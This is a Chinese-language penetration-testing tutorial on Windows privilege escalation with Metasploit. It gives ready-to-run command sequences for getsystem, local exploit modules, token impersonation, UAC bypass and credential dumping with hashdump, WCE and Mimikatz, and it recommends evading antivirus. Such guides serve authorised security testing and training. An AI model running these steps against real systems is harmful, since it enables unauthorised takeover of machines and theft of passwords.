Metasploit权限提升全剧终
字数 1480 2025-08-29 08:31:47
Metasploit权限提升全面指南
0×01 权限提升概述
权限提升是渗透测试中的关键环节,主要分为两类:
-
纵向提权:低权限角色获得高权限角色的权限
- 例如:webshell权限提升到管理员权限
-
横向提权:获取同级别角色的权限
- 例如:通过系统A获取系统B的权限
检查当前权限
在meterpreter shell中:
shell
whoami /groups
查看Mandatory Label判断当前权限级别:
Medium MandatoryLevel:标准用户High MandatoryLevel:管理员权限
0×02 getsystem提权
基本使用
getsystem -h # 查看帮助
getsystem # 尝试所有技术提权
三种提权技术
- 命名管道模拟
- 令牌复制
- 命名管道模拟(替代方案)
特点:
- 简单高效
- 建议首先尝试此方法
0×03 利用本地漏洞提权
步骤
-
检查当前权限:
getuid -
获取系统补丁信息:
shell systeminfo # 或检查c:\windows\下的补丁日志 -
查找可用漏洞(常见漏洞示例):
- ms13_053
- ms14_058
- ms16_016
- ms16_032
漏洞资源网站
- 安全焦点:http://www.securityfocus.com/bid
- Exploit-DB:http://www.exploit-db.com
操作示例(以ms16_016为例)
background # 转为后台
search ms16_016
use exploit/windows/local/ms16_016_webdav
set SESSION [当前session ID]
exploit
部分系统补丁对照表
| 系统版本 | 补丁号 | 对应漏洞 |
|---|---|---|
| Win2003 | KB2360937 | MS10-084 |
| Win2008 | KB2478960 | MS11-014 |
| Win2012 | KB2507938 | MS11-056 |
| 通用 | KB3045171 | MS15-051 |
| 通用 | KB3000061 | MS14-058 |
0×04 假冒令牌提权
令牌类型
- Delegation Tokens:授权令牌,支持交互式登录
- Impersonation Tokens:模拟令牌,非交互会话
操作步骤
use incognito
list_tokens -u # 列出可用令牌
impersonate_token [管理员令牌路径]
# 例如:impersonate_token "WIN-57TJ4B561MT\Administrator"
验证
shell
whoami
0×05 绕过UAC提权
UAC设置级别
- 始终通知
- 仅在程序试图更改我的计算机时通知我(默认)
- 同上但不降低桌面亮度
- 从不提示
方法一:Bypassuac模块
use exploit/windows/local/bypassuac
set SESSION [当前session ID]
exploit
注意事项:
- 当前用户必须在管理员组
- UAC设置为默认级别
- 会创建文件,可能被杀毒软件检测
方法二:Bypassuac_injection
use exploit/windows/local/bypassuac_injection
特点:运行在内存中,不触碰硬盘
方法三:RunAs模块
use exploit/windows/local/ask
set FILENAME "update.exe" # 可自定义
exploit
特点:
- 需要用户交互点击"是"
- 可结合免杀技术
0×06 HASH攻击
方法一:hashdump
hashdump # 提取本地HASH
smart_hashdump # 提取域所有用户HASH
方法二:WCE工具
- 上传wce.exe
- 执行:
wce -w # 获取明文密码
方法三:Mimikatz
load mimikatz
kerberos # 获取kerberos凭证
HASH破解网站
- http://www.cmd5.com/
- http://www.xmd5.com/
附录:常用命令速查
| 命令 | 功能 |
|---|---|
getuid |
查看当前权限 |
getsystem |
尝试自动提权 |
sysinfo |
查看系统信息 |
ps |
查看进程列表 |
migrate [PID] |
迁移到高权限进程 |
background |
将session转为后台 |
注意事项
- 按顺序尝试提权方法:getsystem → 本地漏洞 → 令牌假冒 → UAC绕过
- 注意工具免杀处理
- 横向移动前确保已获取足够权限
- Windows 8+系统需要特殊处理
通过系统掌握这些提权技术,可以显著提高渗透测试的成功率,但请务必在合法授权范围内使用这些技术。